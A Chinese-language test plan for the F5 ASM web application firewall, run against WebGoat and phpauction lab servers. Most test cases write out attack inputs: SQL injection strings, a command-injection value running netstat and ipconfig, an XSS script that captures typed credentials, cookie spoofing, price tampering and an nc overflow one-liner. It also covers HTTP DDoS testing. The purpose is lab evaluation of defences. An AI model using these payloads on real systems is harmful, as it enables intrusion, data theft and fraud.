F5 ASM应用安全管理测试方案

1、应用安全管理测试方案F5 - ASM 目 录 TOC o 1-2 h z HYPERLINK l _Toc532414223 一、 综述 综述测试目的 本次是主要是为了了解F5 networks 公司的WEB应用防火墙产品ASM的WEB防护功能和配置方法，测试ASM对多种不同的应用攻击的防护能力,并总结实际应用时的建议配置方法。本次测试是在实验环境搭建OWASP国际组织专用于WEB网站测试的webgoat 网站及hack me的肉鸡，并采用了Webscrab, Jmeter等相关的攻击工具对该网站进行WEB攻击，以验证ASM对目前这些流行的WEB攻击的防护能力。测试拓扑测试设备测试设备数量备注

2、F5 ASM 5900一台版本：V11测试服务器两台WebGoat服务器, phpauction服务器测试终端两台安装WebScarab，Jmeter等攻击工具网络环境准备本次试用的主要目的在于测试F5 ASM应用安全方案是否能够防御基于应用层的攻击。为了保证测试可以顺畅进行，在测试开始之前，需要用户如下准备工作：熟悉HTTP协议及协议流程；准备攻击源发生器；准备代理服务器准备后台Web server环境。IP地址划分ASM 3900 IP地址分配VlanPort Assignment Self IP AddressShared IP AddressgatewayInternal1.1-1.4

3、External1.5-1.8服务器 IP地址分配：IP AddressgatewayWebGoat服务器-1WebGoat服务器-2测试终端 IP地址分配：VlanIP AddressgatewayPC-1PC-2ASM 3900上的virtual server IP 分配Webgoat with ASM: VIP1Php auction with ASM: VIP2 测试进度和人员安排时间工作人员WAF应用攻击防护-功能测试防SQL 注入攻击1（string SQL注入）项目：WEB应用攻击防护分项目：防string SQL注入攻击 测试目的：测试ASM 3900是否能够防护string

4、SQL注入攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP/WebGoat/attack?screen=122&menu=1200&stage=1,通过webscrab将password中的值修改为 or 1=1测试终端将可以在不输入该用户名密码的情况下，登录成功。通过测试终端去访问经过ASM保护的VS，

5、VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP/WebGoat/attack?screen=122&menu=1200&stage=1,通过webscrab将password中的值修改为 or 1=1看ASM是否会阻挡该攻击，并显示相关信息。预期结果：实际结果：备注:防SQL 注入攻击2（数字 SQL注入）项目：WEB应用攻击防护分项目：防数字 SQL注入攻击 测试目的：测试ASM 3900是否能够防护数字 SQL注入攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等W

6、EB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起 SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP2 /WebGoat/attack?Screen=54&menu=1200,用用户名larry,密码larry登录，选取左边的larry，然后点击viewprofile，通过webscrab将employee_id=101修改为employee_id=101 OR 1=1 ORDER BY salary desc，然后提交 测试终端将可以在不输入该用户名密码的情况下，获取N

7、eville的个人信息。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起数字 SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/WebGoat/attack?Screen=54&menu=1200,用用户名larry,密码larry登录，选取左边的larry，然后点击viewprofile，通过webscrab将employee_id=101修改为employee_id=101 OR 1=1 ORDER BY salary desc，然后提交。看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防SQL 注入攻击3（语句 SQ

8、L注入）项目：WEB应用攻击防护分项目：防语句 SQL注入攻击 测试目的：测试ASM 3900是否能够防护语句 SQL注入攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起语句 SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/ WebGoat/attack?Screen=58&menu=1200&Restart=58,在输入用户名的处提交Erwin OR 1=1测试

9、终端将可以在不输入该用户名密码的情况下，获取所有用户的信息。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/ WebGoat/attack?Screen=58&menu=1200&Restart=58,在输入用户名的处提交Erwin OR 1=1看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防SQL 注入攻击4（Database Backdoors）项目：WEB应用攻击防护分项目：防Database Backdoors 测试目的：测试ASM 3900是否能够

10、防护Database Backdoors注入攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/WebGoat/attack?Screen=26&menu=1200,通过webscrab将username中的值修改为101; update employee set salary=10000测试终端将可以在不输入该用户名

11、密码的情况下，可以修改该用户的salary。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/WebGoat/attack?Screen=26&menu=1200,通过webscrab将username中的值修改为101; update employee set salary=10000看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防command injection攻击项目：WEB应用攻击防护分项目：防command injection攻击 测试目的：测试A

12、SM 3900是否能够防护command injection攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起command injection攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/WebGoat/attack?Screen=21&menu=1200,通过webscrab将HelpFile中的值修改为AccessControlMatrix.help & netsta

13、t an & ipconfig测试终端将可以在webgoat 后台主机上执行netstat an 和ipconfig命令，并把结果显示在web界面上。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/WebGoat/attack?Screen=21&menu=1200,通过webscrab将HelpFile中的值修改为AccessControlMatrix.help & netstat an & ipconfig看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防

14、XSS攻击1（钓鱼XSS）项目：WEB应用攻击防护分项目：防XSS攻击 1（钓鱼XSS）测试目的：测试ASM 3900是否能够防护XSS攻击 1（钓鱼XSS），并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起XSS攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/WebGoat/attack?Screen=13&menu=900,通过webscrab在search框中提交func

15、tion hack() alert(Had this been a real attack. Your credentials were just stolen. User Name = + document.forms0.user.value + Password = + document.forms0.pass.value); XSSImage=new Image; XSSImage.src=http:/localhost/WebGoat/catcher?PROPERTY=yes&user=+ document.forms0.user.value + &password= + docume

16、nt.forms0.pass.value + ; This feature requires account login:Enter Username:Enter Password:测试终端可以在该页面上显示一个钓鱼页面，让用户输入用户名和密码。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/WebGoat/attack?Screen=13&menu=900,通过webscrab在search框中提交function hack() alert(Had this been a re

17、al attack. Your credentials were just stolen. User Name = + document.forms0.user.value + Password = + document.forms0.pass.value); XSSImage=new Image; XSSImage.src=http:/localhost/WebGoat/catcher?PROPERTY=yes&user=+ document.forms0.user.value + &password= + document.forms0.pass.value + ; This featur

18、e requires account login:Enter Username:Enter Password:看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防XSS攻击2（stored XSS）项目：WEB应用攻击防护分项目：防XSS攻击2（stored XSS）测试目的：测试ASM 3900是否能够防护防XSS攻击2（stored XSS）攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80

19、，然后对该VS发起XSS攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/ WebGoat/attack?Screen=33&menu=900&stage=1,以Tom Cat 登录，密码为tom,登录后选择“tom cat”,点击 Viewprofile，显示“tom cat”的资料，点击Editprofile，进入Tomcat资料修改表格，在“street”框中输入alert(“XSS TEST”),其他用户在查看tom的资料时，就会弹出“XSS TEST”的窗口，表明XSS攻击成功。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string S

20、QL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/ WebGoat/attack?Screen=33&menu=900&stage=1,以Tom Cat 登录，密码为tom,登录后选择“tom cat”,点击 Viewprofile，显示“tom cat”的资料，点击Editprofile，进入Tomcat资料修改表格，在“street”框中输入alert(“XSS TEST”),看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防XSS攻击3（Cross Site Request Forgery）项目：WEB应用攻击防护分项目：防XSS攻击3(Cr

21、oss Site Request Forgery) 测试目的：测试ASM 3900是否能够防护防XSS攻击3(Cross Site Request Forgery)，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起XSS攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/WebGoat/attack?Screen=9&menu=900,通过webscrab将Message中输入测试

22、终端在访问新增加的这一条留言的时候，就会在页面上载入我们脚本中所制定的内容。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/WebGoat/attack?Screen=9&menu=900,通过webscrab将Message中输入看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防web scraping攻击项目：WEB应用攻击防护分项目：防Site目录爬行 测试目的：测试ASM 3900是否能够防护防Site目录爬行，并且不影响正常用户的使用。 预置条件：测

23、试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起目录爬行攻击。通过lynx、wget、teleport pro等WEB SCAN工具发起攻击：测试终端可以成功获取肉鸡网站的目录。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样通过lynx、wget、teleport pro等WEB SCAN工具发起攻击对该VS发起攻击。看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防参数修改攻击项目：WEB应用攻击防护

24、分项目：防参数修改攻击 测试目的：测试ASM 3900是否能够防护参数修改攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起参数修改攻击。通过Webscrab等工具进行注入攻击：http:/VIP2/ WebGoat/attack?Screen=53&menu=1600,点击purchase，然后通过webscrab将Price由2999.99修改为100。测试终端通过支付100元就可以完成该交

25、易。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1/ WebGoat/attack?Screen=53&menu=1600,点击purchase，然后通过webscrab将Price由2999.99修改为100。看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防Cookie欺骗攻击项目：WEB应用攻击防护分项目：防cookie欺骗攻击 测试目的：测试ASM 3900是否能够防护cookie欺骗攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或

26、WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起Cookie欺骗攻击。通过Webscrab等工具进行cookie欺骗攻击：http:/VIP2 /WebGoat/attack?Screen=57&menu=1700,首先以webgoat/webgoat登录，并刷新页面，在页面中显示一个authCookie数值；再以aspect/aspect登录，并刷新页面，在页面中显示一个authCookie数值；最后以alice登录，并刷新页面，将AuthCookie=65

27、432fdjmb添加在Cookie=JSESSIONID=XXXXX;后，然后提交post。测试终端将可以在不输入该用户名密码的情况下，通过提交其他用户的认证COOKIE的情况下进行登录。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起string SQL注入攻击。通过Webscrab等工具进行注入攻击：http:/VIP1 /WebGoat/attack?Screen=57&menu=1700,首先以webgoat/webgoat登录，并刷新页面，在页面中显示一个authCookie数值；再以aspect/aspect登录，并刷新页面，在页面中显示一个authCook

28、ie数值；最后以alice登录，并刷新页面，将AuthCookie=65432fdjmb添加在Cookie=JSESSIONID=XXXXX;后，然后提交post。看ASM是否会阻挡该攻击，并显示帮助信息。预期结果：实际结果：备注:防缓冲区溢出攻击项目：WEB应用攻击防护分项目：防缓冲区溢出攻击 测试目的：测试ASM 3900是否能够防护缓冲溢出区攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后通过GE

29、T或POST对该VS发起缓冲区溢出攻击：在测试终端上运行$echo e “GET /login.php?user= perl e print “a” x 500 nHTTP/1.0nn ”| Nc vv http:/VIP2:80测试终端运行完该脚本后，后台服务器故障，页面出错。通过测试终端去访问经过ASM保护的VS，VIP1:80，然后通过GET或POST对该VS发起缓冲区溢出攻击：在测试终端上运行$echo e “GET /login.php?user= perl e print “a” x 500 nHTTP/1.0nn ”| Nc vv http:/VIP1:80看ASM是否会阻挡该攻

30、击，并显示帮助信息。预期结果：实际结果：备注:黑白名单功能项目：WEB应用攻击防护分项目：黑白名单功能 测试目的：测试ASM 3900是否具有黑白名单的功能，只允许访问白名单里面的URL或文件类型。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。在黑名单里面设置不允许访问的URL。测试过程：测试终端将去访问未被保护的VS,http:/VIP2/URL测试终端将可以访问webgoat的这个URL。通过测试终端去访问经过ASM保护的VS，http:/VIP1/URL，同样对该VS发起访问。看ASM是否会阻

31、挡该访问，并显示帮助信息。预期结果：实际结果：备注:恶意代码执行攻击项目：WEB应用攻击防护分项目：恶意代码执行攻击 测试目的：测试ASM 3900是否能够防护恶意代码执行攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后向该VS上传一个含有恶意代码的PHP文件；测试终端可以成功上传该文件。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS上传一个含有恶意代码的PHP文件；看ASM是否会阻

32、挡该攻击，并显示帮助信息。预期结果：实际结果：备注:多层编译攻击项目：WEB应用攻击防护分项目：多层编译攻击测试目的：测试ASM 3900是否能够防护多层编译的攻击，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 WebScarab，Jmeter等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。测试过程：测试终端访问ASM上未被保护的VS，VIP2：80，然后对该VS发起编码攻击。通过Webscrab等工具进行注入攻击：http:/VIP/index.php,通过webscrab将username中的值修改为 or 1=1，登陆后点击sell an it

33、em发布一个item， 里面的内容可以填入一些经过编码的内容（比如url编码）。测试可以成功发布经过编码的内容。通过测试终端去访问经过ASM保护的VS，VIP1:80，同样对该VS发起编码攻击。看ASM是否会阻挡该攻击，并显示相关信息。预期结果：实际结果：备注:基于IP的DDOS防护项目：WEB应用层DDOS防护分项目：基于IP地址的DDOS防护 测试目标：测试ASM 3900是否能够基于攻击端的IP地址阻断攻击。 攻击模型：发起端触发DDOS攻击，请求发给代理服务器每个代理服务器上启用6个代理进程，这样可以达到更高的Http并发效果。ASM的防护策略：基于IP 速率DDOS防护。测试过程：一

34、个攻击触发器打500线程的请求发给代理服务器6个进程。攻击请求URL：40/f5.html查看ASM的连接数，new session=5.5K CC=3.9K (策略生效前) CC=200（策略生效后）查看ASM DDOS告警报告。ASM 配置结论：F5 ASM能够识别http DDOS攻击源，并有效阻断这个源IP。同时删除攻击连接，释放后端服务器CPU资源。同时从其他IP发起 Http请求可以正常访问。备注:后台服务器CPU资源下降20%。基于IP速率的DDOS集成防护项目：WEB应用层DDOS防护分项目：基于IP地址的DDOS集成防护 测试目标：测试ASM 3900是否能够基于攻击端的IP

35、地址阻断攻击，但通过该IP地址的正常连接可以访问。 攻击模型：发起端触发DDOS攻击，请求发给代理服务器每个代理服务器上启用6个代理进程，这样可以达到更高的Http并发效果。ASM的防护策略：基于IP DDOS 集成防护。测试过程：一个攻击触发器打500线程的请求发给代理服务器6个进程。攻击请求URL：40/f5.html查看ASM的连接数，new session=5.5K CC=3.9K (策略生效前) CC=200（策略生效后）查看ASM DDOS告警报告。 在代理服务器上用IE浏览器访问页面。从其他IP地址访问网页。ASM配置：结论：F5 ASM能够识别http DDOS攻击源，并有效阻

36、断这个源IP的无效连接。释放后端服务器CPU资源。同时基于这个IP 的正常Http请求可以正常访问。其他IP地址访问不受影响。备注:后台服务器CPU资源下降20%。基于URL速率的DDOS防护项目：WEB应用层DDOS防护分项目：基于URL 速率的DDOS防护 测试目标：测试ASM 3900是否能够基于被保护站点的页面异常访问阻断攻击，但通过攻击源IP地址的正常访问不影响。 攻击模型：发起端触发DDOS攻击，请求发给代理服务器每个代理服务器上启用6个代理进程，这样可以达到更高的Http并发效果。ASM的防护策略：基于URL 速率DDOS 防护。测试过程：一个攻击触发器打500线程的请求发给代理

37、服务器6个进程。攻击请求URL：40/f5.html查看ASM的连接数查看ASM DDOS告警报告。 在代理服务器上用IE浏览器访问页面。从其他IP地址访问网页。ASM配置：结论：F5 ASM能够识别http DDOS攻击源，并有效阻断这个源IP的无效连接。释放后端服务器CPU资源。同时其他IP 的正常Http请求可以正常访问。基于URL速率的DDOS防护项目：WEB应用层DDOS防护分项目：基于URL 速率的DDOS集成防护 测试目标：测试ASM 3900是否能够基于被保护站点的页面异常访问阻断攻击，但从攻击源IP地址发起的正常访问不影响。 攻击模型：发起端触发DDOS攻击，请求发给代理服务

38、器每个代理服务器上启用6个代理进程，这样可以达到更高的Http并发效果。ASM的防护策略：基于URL DDOS 集成防护。测试过程：一个攻击触发器打100线程的请求发给代理服务器6个进程。在起一个攻击触发器打500线程，请求发给另一台代理服务器的6个进程。攻击请求URL：40/f5.html查看ASM的连接数查看ASM DDOS告警报告。 在代理服务器上用IE浏览器访问页面。从其他IP地址访问网页。ASM配置：结论：F5 ASM能够识别http DDOS攻击源，并有效阻断这个源IP的无效连接。释放后端服务器CPU资源。同时从攻击源IP发起的正常请求和其他IP 的正常Http请求可以正常访问。用

39、户会话感知及安全防护与web应用安全扫描器集成与知名web扫描器（IBMs AppScan，Cenzic Hailstorm，Qualys QualysGuard WhiteHat Sentinel）基于地理位置的防护功能防止暴力破解其他安全功能测试性能峰值处理 当站点流量增大超出当前的ASM的承载能力时，可以通过F5强大的Irule功能，将图片、flash或其它文件类型直接bypass到后台服务器。这样既保证了站点的安全防护，又不影响应用系统的访问。项目：WEB应用攻击防护分项目：性能峰值处理测试目的：测试ASM 3900是否能够在流量压力大的情况下，将图片、flash或其它文件类型直接by

40、pass到后台服务器，并且不影响正常用户的使用。 预置条件：测试终端上需安装浏览器或 TamperIE,Webscrab,Paros等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。编辑irule脚本测试过程：测试终端去访问经过ASM保护的VS，VIP1:80，并且在测试终端模拟大量并发连接。查看ASM的cup，内存使用率。在VS上关联irule。观察ASM的cup，内存使用情况。预期结果：实际结果：备注:在设备之间自动同步安全策略DNS DDOS防护功能 DNS服务器很容易受各种形式的攻击。DDOS攻击就是其中一种，通常导致DNS服务器资源耗尽，无法提供正常的域名解析

41、，DNS Express 正是针对DNS DDOS攻击采取的一种解决方案，DNS Experss无与伦比的DNS性能可以忍受高水平的DNS攻击，在保护您的企业的同时，还能够为应用和服务保持最大且持续不断的可用性。 F5 ltm充当一个Slave name server，后台真实的DNS服务器是master name server，Slave name server从master name server同步zone file，获取最新的zonefile配置，并将这些配置加载到F5的内存充当一个高速的从DNS服务器，从而提供高速率，高性能的DNS解析能力。这样所有的DNS查询都是由F5来提供响应，

42、F5的处理能力可以提供百万到千万的QPS。这样高性能的处理能力完全可以应付DDOS攻击。 项目：WEB应用攻击防护分项目：DNS DDOS防护功能测试目的：测试ASM 3900是否能够提供高速率，高性能的DNS解析能力预置条件：测试终端上需安装浏览器或 TamperIE,Webscrab,Paros等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。在F5上配置DNS Expess的内容，同步后台DNS服务器的zonefile。测试过程：测试终端通过F5上的DNS VS 进行DNS解析查询。 可以使用nslookup或dig命令验证。查看解析结果。模拟DNS的DDOS攻击

43、，查看能否正常解析。预期结果：实际结果：备注:安全防护的扩展性ASM可以为单个站点做安全防护，也可以为多个站点做安全防护，并且当单个站点流量超过单台ASM的承载能力时，可以采用多台ASM设备防护同一站点。Web 服务器Core SwitchAccess SwitchInternetASMLTMF5 ASM建议采用Pool member旁路反向代理部署方式。ASM作为LTM上的VS中的一个Pool member，优先级高。Web服务器也作为Pool member，但优先级低。只有在高优先级Pool member down掉，低优先级的Pool member才处理流量。在ASM上配置真正的Web服

44、务器作为自己的Pool member，将ASM过滤后，安全的流量发给Web服务器处理。转发时，源地址变为ASM的接口地址（SNAT Automap）发给后台服务器。该部署模型要求ASM和Web 服务器的网关都指向F5 LTM地址。如果是LTM+ASM的部署方式，就不涉及源地址转换。ASM也可以为多业务做应用安全防护。在ASM上预先配置好要保护业务的服务器作为自己的VS 中的Pool member。当哪个业务需要做ASM防护时，把ASM划到这个业务的Pool member中，并将优先级调高。这样就可以保护这个业务了。ASM也可以同时保护多个业务，前提是考虑ASM的性能，不能超过ASM承载能力。这

45、时ASM可以采用一组设备，作为一个应用安全池放在网络上。当哪个业务需要保护，就把资源器放到哪个Pool中。Web 服务器池Core SwitchAccess SwitchInternetLTMASM 服务器池项目：WEB应用攻击防护分项目：安全防护的扩展性测试目的：测试ASM 3900是否能够在战斗流量大的情况下，采取多台ASM共同防护一个站点预置条件：测试终端上需安装浏览器或 TamperIE,Webscrab,Paros等WEB攻击工具。按测试结构连接好网络及各个相关设备，并配置好相应的配置。3. 在现有负载均衡设备的VS的pool里面增加两台ASM作为pool member，并且优先级设置为高。测试过程：测试终端去访问负载均衡设备的VS 。查看该VS的连接是否负载均衡到两台ASM。预期结果：实际结果：备注:对HTTPS流量的防护功能 ASM可以对SSL流量做安全防护，通过在ASM上终结ssl加密流量，经安全过滤后将明文发往服务器，服务器响应经过ASM加密后发回